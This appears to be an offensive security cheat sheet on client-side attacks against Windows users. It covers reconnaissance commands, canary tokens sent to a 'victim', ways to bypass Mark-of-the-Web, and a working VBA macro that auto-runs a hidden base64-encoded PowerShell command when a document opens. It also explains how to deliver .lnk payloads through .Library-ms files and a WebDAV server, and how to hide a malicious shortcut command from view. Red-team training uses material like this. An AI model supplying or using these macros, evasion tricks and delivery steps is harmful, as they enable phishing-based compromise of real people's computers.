SecurityVulnerabilityTerminalCode

Client-Side

Information Gathering

Google Dorks

site:example.com filetype:pdf

Fuzzing

ffuf -ic -w <WORDLIST>:X -u <URL>/X -e .pdf

ExifTool

exiftool -a -u <FILE>

Canarytokens

Generates token links to be sent to the victim, which, once opened, acquire information about the system and send it to a specified email address.

Microsoft Macro

Send files containing malicious macros When the file comes from an external source (internet, ex. email or direct link), will be protected with MOTW. The victim must be persuaded to click on Enable Editing/Enable Content/Checkbox to unblock. Or you need to find a way to prevent MOTW from being applied.

MOTW bypassing

  • If a file is saved directly to FAT32/exFAT (e.g., USB flash drive, SD card), Windows cannot add the MOTW.

  • Compress content into ZIP files using non-Microsoft tools.

  • Extract ZIP archives with third-party apps such as 7-Zip/WinRAR, which remove MOTW from extracted files.

  • Transfer files via cloud services (Google Drive, Dropbox, etc.), which recreate the file on the server and then delete the MOTW.

  • Send or receive files via FTP/SFTP/SMB from non-Windows servers, because these protocols do not support ADS and automatically remove the MOTW.

  • Using complex container files, such as ISO, VHD, or IMG, often does not automatically report the MOTW on internal files.

  1. Create a Word file with extension .doc o .docm (no .docx because it doesn't incorporate or save macros in the document, so it is not persistent).

  2. View -> Macros -> <NAME>(document) -> <CODE VBA> Visual Basic for Applications

  3. Write the macro by accessing the underlying operating system commands with WScript via the Windows Script Host Shell object.

Macros

Since VBA has a 255-character limit for literal strings, encode the command in base64 with Windows and split it into blocks.

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50
for i in range(0, len(str), n):
    print("Str = Str + " + '"' + str[i:i+n] + '"')
sub AutoOpen() 
   MyMacro   
End Sub 
 
sub Document_Open()
   MyMacro
End Sub

Sub myMacro()
   Dim Str As String
   Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
   Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
   ' ...
   Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
   Str = Str + "A== "
   CreateObject("Wscript.Shell").Run Str
End Sub

Windows Library Files

Windows library files are virtual containers for user content. They connect users with data stored in remote locations like web services or shares. These files have a .Library-ms file extension and can be executed by double-clicking them in Windows Explorer.

  1. Create a Windows Library Files (.Library-ms) to be sent to the victim. When they double-click on this file, it will appear as a normal directory in Windows Explorer.

  2. Setup WebDAV pipx install wsgidav mkdir webdav; wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ./webdav

  3. Create malicious files to be inserted into the WebDAV server (ex. .ink)

  4. Send .Library-ms file to the victim and convince them to double-click on our .lnk payload file to execute it.

Windows Library Files

Library files are written in XML and consist of three main parts: General Library Information, Library Properties, Library Locations.

After use, Windows makes changes to the file to optimize it. To ensure that it still works (especially on other machines), you must delete the added serialized tag and re-enter the URL.

Malicious .ink File

New -> Shortcut -> In the Location Name insert the Payload -> Name

We can try to hide the malicious command by inserting a delimiter and a harmless command after it, so as to push the malicious command out of the visible area in the file properties menu.

Last updated

Was this helpful?